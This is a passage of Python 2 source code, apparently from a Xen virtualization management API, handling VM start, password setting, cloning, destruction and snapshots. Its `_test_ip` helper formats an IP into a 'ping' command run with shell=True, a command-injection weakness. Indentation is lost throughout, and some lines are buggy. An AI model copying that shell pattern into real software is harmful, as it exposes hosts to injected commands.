log.debug('====set vm(%s) vcpu,memeory and io rate limit cost time: %s=======' % (vm_ref, e1))
except Exception, exn:
log.error(exn)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM set config error'])
try:
#5. start vm
# st2 = time.time()
log.debug('5. excute start vm>>>>>>>>>>>>>>>>>>')
start_status = self._VM_start(session, vm_ref, False, True).get('Status')
if start_status == 'Failure':
self._VM_destroy(session, vm_ref, True) # start failed, vm destroy
log.debug('6. vm start failed>>>>>>>>> return')
return xen_api_error('vm(%s) start error' % vm_ref)
is_setPasswd = False
if vm_ip:
if ping:
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
if is_on and vm_passwd and origin_passwd:
set_passwd = threading.Thread(target=self._set_passwd, name='set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd, name='check_start_and_set_passwd',\
kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'origin_passwd':origin_passwd, 'vm_type':vm_type})
check_start_and_set_passwd.start()
else:
log.debug('Start VM and change passwd using serial.')
if ping:
timeout = 120
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
if is_on and vm_passwd:
set_passwd = threading.Thread(target=self._set_passwd_via_serial, name='set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
set_passwd.start()
else:
check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd_via_serial, name='check_start_and_set_passwd_via_serial',\
kwargs={'session':session, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
'vm_type':vm_type})
check_start_and_set_passwd.start()
# finally:
# self.__set_passwd_lock__.release()
#6. get record of VM
st4 = time.time()
VM_record = self._VM_get_record(session, vm_ref).get('Value')
if VM_record and isinstance(VM_record, dict):
VM_record['setpasswd'] = is_setPasswd
e4 = time.time() - st4
e5 = time.time() - st1
time_log['get record'] = e4
time_log['total'] = e5
log.debug('return vm record----> %s' % VM_record)
log.debug('8.vm create from template Succeed!>>>>>>>>>>')
log.debug('===vm(%s) set config cost time===' % vm_ref)
# time_log['set config'] = e1
# time_log['load os'] = e2
# time_log['set passwd'] = e3
if time_log.get('set config', ''):
log.debug('set vm vcpu,memeory and io rate limit cost time: %s' % e1)
# if time_log.get('load os', ''):
# log.debug('vmstart and load OS cost time: %s' % e2)
# if time_log.get('set passwd'):
# log.debug('vm set passwd cost time: %s' % e3)
if time_log.get('get record'):
log.debug('vm get record cost time: %s' % e4)
if time_log.get('total'):
log.debug('>>>>Total time<<<<: %s' % e5)
log.debug('=====vm(%s) end=====' % (vm_ref))
return xen_api_success(VM_record)
except Exception, exn:
log.error(exn)
if isinstance(exn, VMBadState):
return xen_api_error(['VM start error, bad power state.'])
log.error('9.vm create error....shutdown and remove vm(%s)' % vm_ref)
self._VM_hard_shutdown(session, vm_ref)
self.VM_destroy(session, vm_ref, True)
storage = self._get_BNStorageAPI_instance()
storage.VDI_destroy(session, vm_ref)
return xen_api_error(['VM start and change password error'])
def _check_start_and_set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 120
deadline = 1
st2 = time.time()
log.debug('6. start to check whether vm load OS>>>>>')
is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd and origin_passwd:
# self.__set_passwd_lock__.acquire()
# try:
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _check_start_and_set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
timeout = 200
st2 = time.time()
log.debug('6. start to check whether vm load OS via serial>>>>>')
is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
e2 = time.time() - st2
log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
# time_log['load os'] = e2
if not is_on:
log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
#raise Exception, '7. vm(vm_ref) cannot ping in %s s' % (vm_ref, timeout)
if is_on and vm_passwd:
# self.__set_passwd_lock__.acquire()
# try:
# st3 = time.time()
self._set_passwd_via_serial(session, vm_ref, vm_passwd, vm_type)
# log.debug("7. set passwd via serial result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
# if not is_setPasswd:
# log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
# e3 = time.time() - st3
# log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# time_log['set passwd'] = e3
def _set_passwd(self, session, vm_ip, vm_ref, vm_passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
is_setPasswd = self._VM_set_passwd(session, vm_ref, vm_ip, vm_passwd, origin_passwd, vm_type).get('Value', '')
log.debug("7. set passwd result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
# test if ping ip return true
def _test_ip(self, ip, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
import os
import subprocess
import datetime
time1 = datetime.datetime.now()
cmd = "ping -w %s %s" % (deadline, ip)
re = subprocess.call(cmd, shell=True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s result: %s, cost time: %s' %(ip, re, str(t)))
if re:
return False
else:
return True
def _set_passwd_via_serial(self, session, vm_ref, vm_passwd, vm_type):
'''
@author: wuyuewen
@summary: Internal method.
'''
st3 = time.time()
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
if cmp(vm_type, 'linux') == 0:
userName = 'root'
else:
userName = 'Administrator'
json_obj = json.dumps({'requestType':'Agent.SetPassword', 'userName':userName, 'password':vm_passwd})
is_setPasswd = Netctl.serial_opt(ip, port, json_obj, False)
log.debug("7. set passwd via serial, result = %s type= %s" % (is_setPasswd, type(is_setPasswd)))
if not is_setPasswd:
log.debug('vm(%s) set passwd via serial failed!' % vm_ref)
e3 = time.time() - st3
log.debug('======vm(%s) set passwd cost time: %s=======' %(vm_ref, e3))
def _VM_start_checkout(self, vm_ip, timeout = 60, deadline = 1):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
cnt = 0
while cnt < timeout:
if self._test_ip(vm_ip, deadline):
return True
# time.sleep(1)
cnt += 1
log.debug('vm not start>>>>>')
return False
def _VM_start_checkout_via_serial(self, session, vm_ref, timeout = 60):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM load os checkout>>>>')
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
log.exception('VM_get_platform_serial failed!')
return xen_api_success(False)
address = response.get('Value')
log.debug('serial port: %s' % str(address))
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
import json
json_obj = json.dumps({'requestType':'Agent.Ping'})
log.debug(json_obj)
if self._test_serial(ip, port, json_obj, timeout):
return True
# cnt = 0
# while cnt < timeout:
# if self._test_serial(ip, port, json_obj):
# return True
## time.sleep(1)
# cnt += 1
log.debug('vm not start>>>>>')
return False
def _test_serial(self, ip, port, json_obj, timeout):
'''
@author: wuyuewen
@summary: Internal method.
'''
import datetime
time1 = datetime.datetime.now()
re = Netctl.serial_opt(ip, port, json_obj, False, timeout, True)
time2 = datetime.datetime.now()
t = time2 - time1
log.debug('ping %s:%s result: %s, cost time: %s' %(ip, port, re, str(t)))
return re
'''
generate template from vm
1. vm_clone
2. set template
return True or False
'''
def VM_create_image(self, session, vm_ref, template_name, template_uuid):
'''
@author: wuyuewen
@summary: Generate template from VM, contain several options:
1. vm_clone
2. set template
@param session: session of RPC.
@param vm_ref: VM's uuid
@param template_name: new template name.
@param template_uuid: template uuid
@return: True | False
@rtype: dict.
'''
log.debug('==========vm(%s) create template==========' % vm_ref)
result = False
try:
response = self.VM_clone(session, vm_ref, template_name, None, template_uuid)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
assert domuuid == template_uuid
log.debug('new VM uuid:%s' % domuuid)
self.VM_set_is_a_template(session, template_uuid, True)
result = True
except Exception, exn:
log.exception(exn)
self.VM_destroy(session, template_uuid, True)
finally:
log.debug('============end===============')
return xen_api_success(result)
def VM_clone(self, session, vm_ref, newname, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Internal method. Clone VM, contain several options:
1. get origin VM's VDIs
2. clone VM
3. if clone VM success, clone VDIs
@param session: session of RPC.
@param vm_ref: origin VM's uuid
@param newname: new VM's name
@param vdi_uuid_map: origin VM's VDIs mapping to new clone VDIs
@param newuuid: new VM's uuid
@param vdi_exists: True | False, if new VDIs exist or not(create in advance).
@return: True | False
@rtype: dict.
'''
log.debug('in VM_clone')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parrent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local', vm_ref, newname, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone', vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
log.debug('New domain uuid: %s' % domuuid)
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
# log.debug("return from async")
return response
else:
log.debug('in VM_clone local')
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local(session, vm_ref, newname, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone local, else')
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone(self, session, vm_ref, newname, vdi_uuid_map=None, newuuid=None):
log.debug('in _VM_clone')
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100, xendom.domain_clone, vm_ref, newname,\
vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
'''
when clone a VM, need to pass the MAC value
'''
def VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map = None, newuuid = None, vdi_exists = False):
'''
@author: wuyuewen
@summary: Clone VM with param MAC.
@see VM_clone
'''
log.debug('in VM_clone with MAC...')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parrent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
# log.debug("update pool data structs before clone!!!")
# BNPoolAPI.update_data_struct("vm_clone", newuuid, h_ref)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# log.debug('New domain uuid: %s' % domuuid)
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if cmp(response.get('Status'), 'Success') == 0:
domuuid = response.get('Value')
if not domuuid:
log.exception('WARNING: VM_clone_MAC, domuuid not return!!!')
domuuid = newuuid
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone MAC')
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
log.debug('VM_clone_local_MAC >>>>>')
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid = newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_MAC
'''
log.debug('in _VM_clone_MAC')
xendom = XendDomain.instance()
domuuid = xendom.domain_clone_MAC(vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = XendTask.log_progress(0, 100, xendom.domain_clone_MAC, vm_ref, newname, mac_addr,\
# vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
def VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Clone VM system VDI
@param session: session of RPC.
@param vm_ref: VM's uuid
@param newuuid: new VDI uuid
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_clone_system_VDI', vm_ref, newuuid)
else:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
def _VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_system_VDI
'''
try:
storage = self._get_BNStorageAPI_instance()
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value')
if sys_vdi:
vdi_uuid_map = { sys_vdi : newuuid }
new_vdi = storage.VDI_clone(session, vdi_uuid_map, newuuid, newuuid).get('Value')
if new_vdi:
return xen_api_success(new_vdi)
else:
return xen_api_error(['VM_clone_system_VDI', ' Failed'])
else:
return xen_api_error(['VM_clone_system_VDI', ' orig VDI not found!'])
except Exception, exn:
log.debug(exn)
storage.VDI_destroy(session, newuuid)
return xen_api_error(['VM_clone_system_VDI', ' Exception'])
def VM_destroy(self, session, vm_ref, del_vdi=False, del_ha_sxp=True, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Destroy the specified VM. The VM is completely removed from the system.
This function can only be called when the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param del_vdi: True | False, destroy VM's VDIs either
@param del_ha_sxp: True | False, destroy sxp file in HA dir.
@param update_pool_structs: True | False, update_pool_structs in Xend memory structure.
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
storage = self._get_BNStorageAPI_instance()
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
log.debug("destroy local vm: %s" % vm_ref)
return xen_rpc_call(host_ip, 'VM_destroy_local', vm_ref, True)
if cmp(host_ref, XendNode.instance().uuid) == 0:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
else:
vdis = xen_rpc_call(host_ip, 'VDI_get_by_vm', vm_ref).get('Value')
response = xen_rpc_call(host_ip, 'VM_destroy', vm_ref, del_vdi, del_ha_sxp, update_pool_structs)
if update_pool_structs:
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
## host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
# xen_rpc_call(host_ip, 'VDI_destroy', vdi, True)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_destroy_local(session, vm_ref, del_vdi)
else:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
if del_vdi and vdis:
# host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
return response
def VM_destroy_local(self, session, vm_ref, del_vdi=False):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, False)
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
for vdi in vdis:
storage._VDI_destroy(session, vdi)
return response
def _VM_destroy(self, session, vm_ref, del_ha_sxp=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# vifs = dom.get_vifs()
# if vifs:
# for vif in dom.get_vifs():
# self._VM_del_ip_map(session, vm_ref, vif)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_delete", vm_ref, del_ha_sxp, update_pool_structs)
def VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param label: label(uuid or name) of VM
@param exactMatch: full match the given label
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
all_vms = self._VM_get_lost_vm_by_label(session, label, exactMatch).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_label', label, exactMatch)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_label(session, label, exactMatch)
def _VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_label
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_label(label, exactMatch))
def VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: In some uncommon conditions VM will destroy by Xend but VM disk(VDIs) still exist.
This method can find VM via HA stored sxp file.
@param session: session of RPC.
@param date1: date of start
@param date2: date of end
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
now_vms = []
all_vms = self._VM_get_lost_vm_by_date(session, date1, date2).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_date', date1, date2)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
now_vms_resp = self.VM_get_all(session)
if cmp(now_vms_resp['Status'], 'Success') == 0:
now_vms = now_vms_resp.get("Value")
if now_vms:
for i in all_vms.keys():
vm_uuid_s = re.search("\/(S+)\/", i)
if i in now_vms:
del all_vms[i]
continue
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_date(session, date1, date2)
def _VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_date
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_date(date1, date2))
def VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown and immediately restart the VM.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_reboot(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_reboot', vm_ref)
else:
return self._VM_hard_reboot(session, vm_ref)
def _VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_reboot
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_reset", vm_ref)
def VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_shutdown(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_shutdown', vm_ref)
i = 0
time_out = 120
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref)['Value']
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
break
elif cmp(i, time_out) > 0:
break
else:
time.sleep(0.5)
continue
else:
return self._VM_hard_shutdown(session, vm_ref)
def _VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_shutdown
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_destroy", vm_ref)
def VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_pause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_pause', vm_ref)
else:
return self._VM_pause(session, vm_ref)
def _VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_pause", vm_ref)
# do snapshot for system vdi of vm
def VM_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Take a snapshot of VM's system VDI. The sragent running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_snapshot_vdi(session, vdi_ref, name)
# snapshot for vdi of vm
def _VM_snapshot_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.exception('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record(session, sr).get('Value')
if not sr_rec:
log.exception('Get SR record failed!')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
log.debug('gpfs snapshot>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_gpfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_mfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
